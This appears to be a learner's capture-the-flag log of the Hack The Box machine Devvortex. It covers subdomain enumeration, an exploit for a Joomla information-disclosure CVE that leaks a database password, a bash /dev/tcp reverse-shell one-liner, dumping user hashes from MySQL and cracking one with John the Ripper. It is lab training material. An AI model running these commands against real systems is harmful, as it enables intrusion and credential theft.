Open roaris opened 2 months ago
Accessing http://10.10.11.242 redirects to http://devvortex.htb, so add the following to /etc/hosts
10.10.11.242 devvortex.htb
No X-Powered-By header in the response, and nothing important in the page source either.
gobuster turned up /images/, /css/ and /js/, but accessing any of them returns 403.
$ gobuster dir --url http://devvortex.htb --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://devvortex.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 178] [--> http://devvortex.htb/images/]
/css (Status: 301) [Size: 178] [--> http://devvortex.htb/css/]
/js (Status: 301) [Size: 178] [--> http://devvortex.htb/js/]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
Tried adding -f just in case, but no change.
$ gobuster dir --url http://devvortex.htb --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -f
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://devvortex.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Add Slash: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images/ (Status: 403) [Size: 162]
/css/ (Status: 403) [Size: 162]
/js/ (Status: 403) [Size: 162]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
https://github.com/roaris/ctf-log/issues/36#issuecomment-2094652522 https://github.com/roaris/ctf-log/issues/36#issuecomment-2094657844 I already looked into nginx 1.18 before.
OpenSSH 8.2p1 doesn't show up on exploit-db. A Google search turns up https://www.cybersecurity-help.cz/vdb/SB2023072068; I don't fully understand it, but the attack conditions are probably not met.
I also did subdomain enumeration. https://zenn.dev/sho00/articles/f089938def13ca Apparently you just change dir to vhost in the directory enumeration command.
https://github.com/OJ/gobuster/blob/master/gobustervhost/gobustervhost.go I guess it sets the Host header to <wordlist value>.devvortex.htb and checks whether a response comes back. That said, everything in the output is 400... All the domain names are space-separated, so presumably they are being rejected with 400 as invalid Host headers containing spaces.
$ gobuster vhost --url http://devvortex.htb --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://devvortex.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: video games Status: 400 [Size: 166]
Found: cable tv Status: 400 [Size: 166]
Found: cell phones Status: 400 [Size: 166]
Found: long distance Status: 400 [Size: 166]
Found: nero 7 Status: 400 [Size: 166]
Found: spyware doctor Status: 400 [Size: 166]
Found: Michael Jackson - Thriller Status: 400 [Size: 166]
Found: Fall Out Boy - From Under The Cork Tree Status: 400 [Size: 166]
Found: DVD Tools Status: 400 [Size: 166]
Found: windows xp Status: 400 [Size: 166]
Found: 3 Popular Music Videos Status: 400 [Size: 166]
Found: Justin Timberlake - FutureSexyLoveSounds Status: 400 [Size: 166]
Found: ABBA - 15 albums Status: 400 [Size: 166]
Found: Westlife - The Love Album Status: 400 [Size: 166]
Found: Outside Out Status: 400 [Size: 166]
Found: The Kooks - Inside In Status: 400 [Size: 166]
Found: Oasis - 'Definitely Maybe' Status: 400 [Size: 166]
Found: Paolo Nutini - These Streets Status: 400 [Size: 166]
Found: The Beatles - Abbey Road Status: 400 [Size: 166]
Found: Il Divo - Siempre Status: 400 [Size: 166]
Found: The Beatles - Love Status: 400 [Size: 166]
Found: Akon - Konvicted Status: 400 [Size: 166]
Found: Guns N Roses - Appetite for Destruction Status: 400 [Size: 166]
Found: Razorlight - Razorlight Status: 400 [Size: 166]
Found: All popular movies 2006 Status: 400 [Size: 166]
Found: Dreamland 2006 Status: 400 [Size: 166]
Found: Tom and Jerry - Full Collection Status: 400 [Size: 166]
Found: Online TV Player Status: 400 [Size: 166]
Found: PowerArchiver 2006 Status: 400 [Size: 166]
Found: Most Popular Games Status: 400 [Size: 166]
Found: Battlefield 2142 Status: 400 [Size: 166]
Found: graphic design Status: 400 [Size: 166]
Found: System Tools Status: 400 [Size: 166]
Found: any dvd Status: 400 [Size: 166]
Found: Star Wars Status: 400 [Size: 166]
Found: google earth Status: 400 [Size: 166]
Found: Office Space Status: 400 [Size: 166]
Found: World of Warcraft Status: 400 [Size: 166]
Found: Nero 6 Status: 400 [Size: 166]
Found: Norton Internet Security 2006 Status: 400 [Size: 166]
Found: Video Editors Status: 400 [Size: 166]
Found: United States Status: 400 [Size: 166]
Found: photoshop cs2 Status: 400 [Size: 166]
Found: registry mechanic Status: 400 [Size: 166]
Found: web design Status: 400 [Size: 166]
Found: Real-Time Communication Status: 400 [Size: 166]
Found: Alien Shooter Status: 400 [Size: 166]
Found: Blender Foundation Status: 400 [Size: 166]
Found: About Blender Status: 400 [Size: 166]
Found: American Pie Status: 400 [Size: 166]
Found: Eszter Takacsi - Megaflood of Sets Status: 400 [Size: 166]
Found: American Pie 2 Status: 400 [Size: 166]
Found: American Wedding Status: 400 [Size: 166]
Found: Empire Earth II Status: 400 [Size: 166]
Found: Building Materials Status: 400 [Size: 166]
Found: Spy Sweeper Status: 400 [Size: 166]
Found: winrar 3 Status: 400 [Size: 166]
Found: Sony Vegas 6 Status: 400 [Size: 166]
Found: clone dvd Status: 400 [Size: 166]
Found: Registry Mechanic 5 Status: 400 [Size: 166]
Found: Comanche 4 Status: 400 [Size: 166]
Found: Check All Tracker Features! Status: 400 [Size: 166]
Found: Check Screenshots! Status: 400 [Size: 166]
Found: About Us Status: 400 [Size: 166]
Found: Contact Us Status: 400 [Size: 166]
Found: weight loss Status: 400 [Size: 166]
Found: North Korea Status: 400 [Size: 166]
Found: New York Status: 400 [Size: 166]
Found: amateur sex Status: 400 [Size: 166]
Found: jenna haze Status: 400 [Size: 166]
Found: Crazy Frog Status: 400 [Size: 166]
Found: Mariah Carey Status: 400 [Size: 166]
Found: My Chemical Romance Status: 400 [Size: 166]
Found: Paris Hilton Status: 400 [Size: 166]
Found: Nelly Furtado Status: 400 [Size: 166]
Found: Christina Aguilera Status: 400 [Size: 166]
Found: WinAVI Video Converter 7 Status: 400 [Size: 166]
Found: Picture 1 Status: 400 [Size: 166]
Found: I Tube Status: 400 [Size: 166]
Found: home entertainment Status: 400 [Size: 166]
Found: South Korea Status: 400 [Size: 166]
Found: bX Warez Status: 400 [Size: 166]
Found: Driver 3 Status: 400 [Size: 166]
Found: RTL Biathlon 2007 Status: 400 [Size: 166]
Found: Titan Quest Status: 400 [Size: 166]
Found: WinAVI Video Converter Status: 400 [Size: 166]
Found: RegDoctor 1 Status: 400 [Size: 166]
Found: Registry Mechanic Status: 400 [Size: 166]
Found: Kaspersky Anti-Hacker 1 Status: 400 [Size: 166]
Found: Internet Tools Status: 400 [Size: 166]
Found: Graphics Design Status: 400 [Size: 166]
Found: Selteco Flash Designer Status: 400 [Size: 166]
Found: Internet Download Manager Status: 400 [Size: 166]
Found: Codecs Media Plugins Status: 400 [Size: 166]
Found: Spyware Doctor Status: 400 [Size: 166]
Found: norton antivirus 2006 Status: 400 [Size: 166]
Found: Midtown Madness 2 Status: 400 [Size: 166]
Found: Need for Speed Most Wanted Status: 400 [Size: 166]
Found: alcohol 120 Status: 400 [Size: 166]
Found: The Godfather Status: 400 [Size: 166]
Found: South America Status: 400 [Size: 166]
Found: Roger Dubuis Status: 400 [Size: 166]
Found: Louis Vuitton Status: 400 [Size: 166]
Found: Vacheron Constantin Status: 400 [Size: 166]
Found: warcraft 3 cd key Status: 400 [Size: 166]
Found: nero 7 serial number Status: 400 [Size: 166]
Found: need for speed Status: 400 [Size: 166]
Found: nero 7 serial Status: 400 [Size: 166]
Found: Comodo - AntiPhishing Portfolio Status: 400 [Size: 166]
Found: Brien icon1113561605609 Status: 400 [Size: 166]
Progress: 87664 / 87665 (100.00%)
===============================================================
Finished
===============================================================
Stuck, so Guided Mode.
Task1 : How many open TCP ports are listening on Devvortex? A : 2
Task2: What subdomain is configured on the target's web server? Hint : When browsing to the web application, you are redirected to the devvortex.htb domain. Use a tool such as gobuster or ffuf to fuzz for common subdomains that respond differently.
But I already did subdomain enumeration...
Tried changing the wordlist, but nothing shows up.
$ gobuster vhost --url http://devvortex.htb --wordlist /usr/share/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://devvortex.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: false
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Progress: 22292 / 100001 (22.29%)
https://github.com/OJ/gobuster/blob/master/gobustervhost/gobustervhost.go#L113-L119 It seems that unless you run it with the --append-domain option, the Host header is not set to <wordlist value>.devvortex.htb but to the wordlist value itself.
$ gobuster vhost --url http://devvortex.htb --wordlist /usr/share/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt --append-domain
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://devvortex.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
[+] Append Domain: true
===============================================================
Starting gobuster in VHOST enumeration mode
===============================================================
Found: dev.devvortex.htb Status: 200 [Size: 23221]
Progress: 221 / 100001 (0.22%)
Found dev.devvortex.htb.
Add the following to /etc/hosts
10.10.11.242 dev.devvortex.htb
Task2: What subdomain is configured on the target's web server? Hint : When browsing to the web application, you are redirected to the devvortex.htb domain. Use a tool such as gobuster or ffuf to fuzz for common subdomains that respond differently. A : dev.devvortex.htb
Run directory enumeration against dev.devvortex.htb.
$ gobuster dir --url http://dev.devvortex.htb --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://dev.devvortex.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/images/]
/home (Status: 200) [Size: 23221]
/media (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/media/]
/templates (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/templates/]
/modules (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/modules/]
/plugins (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/plugins/]
/includes (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/includes/]
/language (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/language/]
/components (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/components/]
/api (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/api/]
/cache (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/cache/]
/libraries (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/libraries/]
/tmp (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/tmp/]
/layouts (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/layouts/]
/administrator (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/administrator/]
/cli (Status: 301) [Size: 178] [--> http://dev.devvortex.htb/cli/]
Progress: 26337 / 87665 (30.04%)
Accessing /administrator/ showed a login form. There is a CMS called Joomla!, and this appears to be its login form. Searching exploit-db for Joomla! returns a huge number of results and I can't tell which one to use. I couldn't determine the Joomla! version from the response headers or the page source.
Search exploit-db for joomla remote code execution.
https://www.exploit-db.com/exploits/44358 looked usable.
But it doesn't work when tried with metasploit.
msf6 > search joomla
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/http/joomla_gallerywd_sqli_scanner 2015-03-30 normal No Gallery WD for Joomla! Unauthenticated SQL Injection Scanner
1 exploit/unix/webapp/joomla_tinybrowser 2009-07-22 excellent Yes Joomla 1.5.12 TinyBrowser File Upload Code Execution
2 auxiliary/scanner/http/joomla_api_improper_access_checks 2023-02-01 normal Yes Joomla API Improper Access Checks
3 auxiliary/admin/http/joomla_registration_privesc 2016-10-25 normal Yes Joomla Account Creation and Privilege Escalation
4 exploit/unix/webapp/joomla_akeeba_unserialize 2014-09-29 excellent Yes Joomla Akeeba Kickstart Unserialize Remote Code Execution
5 auxiliary/scanner/http/joomla_bruteforce_login normal No Joomla Bruteforce Login Utility
6 exploit/unix/webapp/joomla_comfields_sqli_rce 2017-05-17 excellent Yes Joomla Component Fields SQLi Remote Code Execution
7 exploit/unix/webapp/joomla_comjce_imgmanager 2012-08-02 excellent Yes Joomla Component JCE File Upload Remote Code Execution
8 exploit/unix/webapp/joomla_contenthistory_sqli_rce 2015-10-23 excellent Yes Joomla Content History SQLi Remote Code Execution
9 exploit/multi/http/joomla_http_header_rce 2015-12-14 excellent Yes Joomla HTTP Header Unauthenticated Remote Code Execution
10 exploit/unix/webapp/joomla_media_upload_exec 2013-08-01 excellent Yes Joomla Media Manager File Upload Vulnerability
11 auxiliary/scanner/http/joomla_pages normal No Joomla Page Scanner
12 auxiliary/scanner/http/joomla_plugins normal No Joomla Plugins Scanner
13 auxiliary/gather/joomla_com_realestatemanager_sqli 2015-10-22 normal Yes Joomla Real Estate Manager Component Error-Based SQL Injection
14 auxiliary/scanner/http/joomla_version normal No Joomla Version Scanner
15 auxiliary/gather/joomla_contenthistory_sqli 2015-10-22 normal Yes Joomla com_contenthistory Error-Based SQL Injection
16 auxiliary/gather/joomla_weblinks_sqli 2014-03-02 normal Yes Joomla weblinks-categories Unauthenticated SQL Injection Arbitrary File Read
17 auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner 2015-03-20 normal No Web-Dorado ECommerce WD for Joomla! search_category_id SQL Injection Scanner
Interact with a module by name or index. For example info 17, use 17 or use auxiliary/scanner/http/joomla_ecommercewd_sqli_scanner
msf6 > use exploit/unix/webapp/joomla_comfields_sqli_rce
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > options
Module options (exploit/unix/webapp/joomla_comfields_sqli_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the Joomla application
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.23.73.202 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Joomla 3.7.0
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > set RHOSTS dev.devvortex.htb
RHOSTS => dev.devvortex.htb
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > set LHOST 10.10.14.42
LHOST => 10.10.14.42
msf6 exploit(unix/webapp/joomla_comfields_sqli_rce) > exploit
[*] Started reverse TCP handler on 10.10.14.42:4444
[-] Exploit aborted due to failure: unknown: 10.10.11.242:80 - Error retrieving table prefix
[*] Exploit completed, but no session was created.
With the SQLi, it's possible to enumerate cookies of Administrator and Super User users, and hijack one of their sessions. If no Super User is authenticated, the RCE portion will not work.
That is what the module description said.
unix/webapp/joomla_contenthistory_sqli_rce didn't work either.
msf6 exploit(unix/webapp/joomla_contenthistory_sqli_rce) > options
Module options (exploit/unix/webapp/joomla_contenthistory_sqli_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to Joomla
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.23.73.202 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Joomla 3.x <= 3.4.4
View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/joomla_contenthistory_sqli_rce) > set RHOSTS dev.devvortex.htb
RHOSTS => dev.devvortex.htb
msf6 exploit(unix/webapp/joomla_contenthistory_sqli_rce) > set LHOST 10.10.14.42
LHOST => 10.10.14.42
msf6 exploit(unix/webapp/joomla_contenthistory_sqli_rce) > exploit
[*] Started reverse TCP handler on 10.10.14.42:4444
[-] Exploit aborted due to failure: unknown: 10.10.11.242:80 - Error retrieving table prefix
[*] Exploit completed, but no session was created.
multi/http/joomla_http_header_rce didn't work either.
msf6 exploit(multi/http/joomla_http_header_rce) > options
Module options (exploit/multi/http/joomla_http_header_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
HEADER USER-AGENT yes The header to use for exploitation (Accepted: USER-AGENT, X-FORWARDED-FOR)
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The base path to the Joomla application
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 172.23.73.202 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Joomla 1.5.0 - 3.4.5
View the full module info with the info, or info -d command.
msf6 exploit(multi/http/joomla_http_header_rce) > set RHOSTS dev.devvortex.htb
RHOSTS => dev.devvortex.htb
msf6 exploit(multi/http/joomla_http_header_rce) > set LHOST 10.10.14.42
LHOST => 10.10.14.42
msf6 exploit(multi/http/joomla_http_header_rce) > exploit
[*] Started reverse TCP handler on 10.10.14.42:4444
[*] 10.10.11.242:80 - Sending payload ...
[*] Exploit completed, but no session was created.
Stuck again, so Guided Mode.
Task3 : What Content Management System (CMS) is running on dev.devvortex.htb? A : Joomla
Task4 : Which version of Joomla is running on the target system? Hint : Joomla websites publicly disclose their version on a certain endpoint. A quick search using your search engine of choice will lead you to it.
This is the one I couldn't figure out from the response headers or the page source.
Following https://docs.joomla.org/How_to_check_the_Joomla_version%3F I checked
http://dev.devvortex.htb/includes/joomla/version.php
http://dev.devvortex.htb/libraries/joomla/version.php
http://dev.devvortex.htb/template/system/css/template.css
http://dev.devvortex.htb/template/system/css/system.css
http://dev.devvortex.htb/languages/en-GB/en-GB.ini
http://dev.devvortex.htb/libraries/cms/version/version.php
http://dev.devvortex.htb/libraries/src/Version.php
but none of them worked.
According to https://qiita.com/Brutus/items/71d3f0c157cb0f2f592a, accessing administrator/manifests/files/joomla.xml shows the version information. That wasn't in the official docs...
https://book.hacktricks.xyz/v/jp/network-services-pentesting/pentesting-web/joomla does mention administrator/manifests/files/joomla.xml.
Task4 : Which version of Joomla is running on the target system? Hint : Joomla websites publicly disclose their version on a certain endpoint. A quick search using your search engine of choice will lead you to it. A : 4.2.6
Since the version is 4.2.6, none of the three exploits I tried met the version requirement.
Googling joomla 4.2.6 exploit found https://github.com/Acceis/exploit-CVE-2023-23752. Fetch the script with searchsploit. It is a Ruby script, but the extension is .py. Running it succeeded.
$ searchsploit -m 51334
Exploit: Joomla! v4.2.8 - Unauthenticated information disclosure
URL: https://www.exploit-db.com/exploits/51334
Path: /usr/share/exploitdb/exploits/php/webapps/51334.py
Codes: CVE-2023-23752
Verified: True
File Type: Ruby script, ASCII text
$ mv 51334.py 51334.rb
$ gem install httpx docopt paint
Fetching httpx-1.2.4.gem
Fetching http-2-next-1.0.3.gem
Successfully installed http-2-next-1.0.3
Successfully installed httpx-1.2.4
Parsing documentation for http-2-next-1.0.3
Installing ri documentation for http-2-next-1.0.3
Parsing documentation for httpx-1.2.4
Installing ri documentation for httpx-1.2.4
Done installing documentation for http-2-next, httpx after 2 seconds
Fetching docopt-0.6.1.gem
Successfully installed docopt-0.6.1
Parsing documentation for docopt-0.6.1
Installing ri documentation for docopt-0.6.1
Done installing documentation for docopt after 0 seconds
Fetching paint-2.3.0.gem
Successfully installed paint-2.3.0
Parsing documentation for paint-2.3.0
Installing ri documentation for paint-2.3.0
Done installing documentation for paint after 0 seconds
4 gems installed
$ ruby 51334.rb http://dev.devvortex.htb
Users
[649] lewis (lewis) - lewis@devvortex.htb - Super Users
[650] logan paul (logan) - logan@devvortex.htb - Registered
Site info
Site name: Development
Editor: tinymce
Captcha: 0
Access: 1
Debug status: false
Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: P4ntherg0t1n5r3c0n##
DB name: joomla
DB prefix: sd4fg_
DB encryption 0
Tried lewis / P4ntherg0t1n5r3c0n##, logan / P4ntherg0t1n5r3c0n##, root / P4ntherg0t1n5r3c0n## and admin / P4ntherg0t1n5r3c0n## against the login at http://dev.devvortex.htb/administrator and via SSH, but all of them failed.
Stuck again, so Guided Mode.
Task5 : What is the 2023 CVE ID for an information disclosure vulnerability in the version of Joomla running on DevVortex? Hint : Search for terms like "joomla 4.2.6 information disclosure". A : CVE-2023-23752
Task6 : What is the lewis user's password for the CMS? Hint : Leverage the vulnerability to enumerate the service's configuration. There is a configuration endpoint that can be accessed using ?public=true that will leak a password. A : P4ntherg0t1n5r3c0n##
Task7 : What table in the database contains hashed credentials for the logan user? Hint : Use the admin access to the CMS to write a PHP shell to one of the templates and obtain an interactive shell on the target. From there, enumerate the local services and use what you already know to access them.
But I can't log in as lewis...
After restarting the machine, I could log in with lewis / P4ntherg0t1n5r3c0n##.
Look for a way to execute commands or a place to drop a webshell.
Couldn't find one, so searching for joomla webshell turned up https://github.com/p0dalirius/Joomla-webshell-plugin. Trying to upload mod_webshell.php as described in its instructions gave an error.
The method at https://book.hacktricks.xyz/network-services-pentesting/pentesting-web/joomla#rce doesn't work either (I can't even find the Templates from "Click on Templates").
bash -c "bash -i >& /dev/tcp/10.10.14.42/4444 0>&1"
Running that gave me a reverse shell.
$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.10.14.42] from devvortex.htb [10.10.11.242] 38390
bash: cannot set terminal process group (860): Inappropriate ioctl for device
bash: no job control in this shell
www-data@devvortex:~/dev.devvortex.htb/administrator$
Can't read user.txt.
www-data@devvortex:~/dev.devvortex.htb/administrator$ cd /home
cd /home
www-data@devvortex:/home$ ls
ls
logan
www-data@devvortex:/home$ cd logan
cd logan
www-data@devvortex:/home/logan$ ls
ls
user.txt
www-data@devvortex:/home/logan$ cat user.txt
cat user.txt
cat: user.txt: Permission denied
The output of the exploit I ran earlier contains
Database info
DB type: mysqli
DB host: localhost
DB user: lewis
DB password: P4ntherg0t1n5r3c0n##
so I tried logging in to MySQL, but there was no response.
www-data@devvortex:~/dev.devvortex.htb/administrator$ mysql --version
mysql --version
mysql Ver 8.0.35-0ubuntu0.20.04.1 for Linux on x86_64 ((Ubuntu))
www-data@devvortex:~/dev.devvortex.htb/administrator$ mysql -u lewis -p
mysql -u lewis -p
Enter password: P4ntherg0t1n5r3c0n##
(no response)
After doing the shell stabilization described at https://qiita.com/Umbrage/items/9ae0698891583dffaf85, it responded.
I have no idea how it works, but on the target run python3 -c "import pty; pty.spawn('/bin/bash')"
and then press Ctrl+Z to drop out of the target shell.
Then, locally, run stty raw -echo; fg
$ stty raw -echo; fg
[2] - continued nc -lvp 4444
www-data@devvortex:~/dev.devvortex.htb/administrator$ mysql -u lewis -p
Enter password:
Welcome to the MySQL monitor. Commands end with ; or \g.
Your MySQL connection id is 41
Server version: 8.0.35-0ubuntu0.20.04.1 (Ubuntu)
Copyright (c) 2000, 2023, Oracle and/or its affiliates.
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
mysql>
Got logan's hashed password.
mysql> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| joomla |
| performance_schema |
+--------------------+
3 rows in set (0.00 sec)
mysql> use joomla
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
mysql> show tables;
+-------------------------------+
| Tables_in_joomla |
+-------------------------------+
| sd4fg_action_log_config |
| sd4fg_action_logs |
| sd4fg_action_logs_extensions |
| sd4fg_action_logs_users |
| sd4fg_assets |
| sd4fg_associations |
| sd4fg_banner_clients |
| sd4fg_banner_tracks |
| sd4fg_banners |
| sd4fg_categories |
| sd4fg_contact_details |
| sd4fg_content |
| sd4fg_content_frontpage |
| sd4fg_content_rating |
| sd4fg_content_types |
| sd4fg_contentitem_tag_map |
| sd4fg_extensions |
| sd4fg_fields |
| sd4fg_fields_categories |
| sd4fg_fields_groups |
| sd4fg_fields_values |
| sd4fg_finder_filters |
| sd4fg_finder_links |
| sd4fg_finder_links_terms |
| sd4fg_finder_logging |
| sd4fg_finder_taxonomy |
| sd4fg_finder_taxonomy_map |
| sd4fg_finder_terms |
| sd4fg_finder_terms_common |
| sd4fg_finder_tokens |
| sd4fg_finder_tokens_aggregate |
| sd4fg_finder_types |
| sd4fg_history |
| sd4fg_languages |
| sd4fg_mail_templates |
| sd4fg_menu |
| sd4fg_menu_types |
| sd4fg_messages |
| sd4fg_messages_cfg |
| sd4fg_modules |
| sd4fg_modules_menu |
| sd4fg_newsfeeds |
| sd4fg_overrider |
| sd4fg_postinstall_messages |
| sd4fg_privacy_consents |
| sd4fg_privacy_requests |
| sd4fg_redirect_links |
| sd4fg_scheduler_tasks |
| sd4fg_schemas |
| sd4fg_session |
| sd4fg_tags |
| sd4fg_template_overrides |
| sd4fg_template_styles |
| sd4fg_ucm_base |
| sd4fg_ucm_content |
| sd4fg_update_sites |
| sd4fg_update_sites_extensions |
| sd4fg_updates |
| sd4fg_user_keys |
| sd4fg_user_mfa |
| sd4fg_user_notes |
| sd4fg_user_profiles |
| sd4fg_user_usergroup_map |
| sd4fg_usergroups |
| sd4fg_users |
| sd4fg_viewlevels |
| sd4fg_webauthn_credentials |
| sd4fg_workflow_associations |
| sd4fg_workflow_stages |
| sd4fg_workflow_transitions |
| sd4fg_workflows |
+-------------------------------+
71 rows in set (0.01 sec)
mysql> select * from sd4fg_users;
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| id | name | username | email | password | block | sendEmail | registerDate | lastvisitDate | activation | params | lastResetTime | resetCount | otpKey | otep | requireReset | authProvider |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
| 649 | lewis | lewis | lewis@devvortex.htb | $2y$10$6V52x.SD8Xc7hNlVwUTrI.ax4BIAYuhVBMVvnYWRceBmy8XdEzm1u | 0 | 1 | 2023-09-25 16:44:24 | 2024-05-09 13:52:56 | 0 | | NULL | 0 | | | 0 | |
| 650 | logan paul | logan | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12 | 0 | 0 | 2023-09-26 19:15:42 | NULL | | {"admin_style":"","admin_language":"","language":"","editor":"","timezone":"","a11y_mono":"0","a11y_contrast":"0","a11y_highlight":"0","a11y_font":"0"} | NULL | 0 | | | 0 | |
+-----+------------+----------+---------------------+--------------------------------------------------------------+-------+-----------+---------------------+---------------------+------------+---------------------------------------------------------------------------------------------------------------------------------------------------------+---------------+------------+--------+------+--------------+--------------+
2 rows in set (0.00 sec)
Task7 : What table in the database contains hashed credentials for the logan user? Hint : Use the admin access to the CMS to write a PHP shell to one of the templates and obtain an interactive shell on the target. From there, enumerate the local services and use what you already know to access them. A : sd4fg_users
How do I recover the original password from this? If it has been stretched, it looks tough.
$2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12
Searching for it only turns up writeups.
Apparently it's a bcrypt hash. https://qiita.com/daiki7010/items/b15de9ef747f5b23c984 https://www.tohoho-web.com/ex/crypt.html#bcrypt
https://qiita.com/Perplex/items/67534c618692fc2456d6 Apparently you use john the ripper.
$ john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 16 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tequieromucho (?)
1g 0:00:00:04 DONE (2024-05-09 23:41) 0.2475g/s 356.4p/s 356.4c/s 356.4C/s winston..michel
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
